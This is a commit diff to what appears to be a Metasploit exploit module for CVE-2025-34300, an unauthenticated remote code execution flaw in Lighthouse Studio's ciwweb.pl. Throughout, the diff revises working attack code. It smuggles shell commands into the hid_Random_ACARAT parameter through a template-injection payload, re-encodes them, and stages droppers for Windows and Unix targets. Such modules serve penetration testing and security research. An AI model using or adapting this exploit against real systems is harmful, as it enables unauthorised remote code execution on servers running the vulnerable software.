Improved Exploit Stability on Windows

vognik · vognik · commit 6276b27dfca4 · 2025-07-21T21:34:01.000+04:00
diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
@@ -94,7 +94,7 @@ def initialize(info = {})
     register_options(
       [
         OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']),
-        OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', ''])
+        OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']),
       ]
     )
   end
@@ -105,7 +105,7 @@ def check
     vars = {
       'hid_javascript' => '1'
     }
-    vars['hid_studyname'] = datastore['STUDYNAME'] unless datastore['STUDYNAME'].to_s.strip.empty?
+    vars['hid_studyname'] = datastore['STUDYNAME'] unless datastore['STUDYNAME'].strip.empty?
 
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path),
@@ -133,39 +133,42 @@ def check
   end
 
   def execute_command(cmd, _opts = {})
-    cmd = Rex::Text.uri_encode(cmd, 'hex-all')
+    cmd = Rex::Text.uri_encode(cmd).gsub('\\', '%5C').gsub('/', '%2F')
 
     query = [
       'hid_javascript=1',
       "hid_Random_ACARAT=[%`#{cmd}`%]",
       "hid_Random_ACARAT=#{Rex::Text.rand_text_alphanumeric(rand(3..5))}"
     ]
 
-    query << "hid_studyname=#{datastore['STUDYNAME']}" unless datastore['STUDYNAME'].to_s.strip.empty?
+    query << "hid_studyname=#{datastore['STUDYNAME']}" unless datastore['STUDYNAME'].strip.empty?
     query_string = query.join('&')
+    print_status(query_string)
 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path),
       'method' => 'GET',
       'query' => query_string
     })
 
-    fail_with(Failure::Unreachable, 'No response from target') unless res
-
-    html = res.get_html_document
-    if html&.text&.include?('Sawtooth Error # 129')
-      fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid')
+    if res
+      html = res.get_html_document
+      if html&.text&.include?('Cannot find default studyname')
+        fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid')
+      end
     end
   end
 
   def exploit
     print_status('Uploading malicious payload...')
 
     case target['Type']
-    when :windows_dropper, :nix_dropper
+    when :windows_dropper
+      execute_cmdstager(temp: '.')
+    when :nix_dropper
       execute_cmdstager
     when :windows_command, :nix_command
       execute_command(payload.encoded)
     end
   end
-end
+end
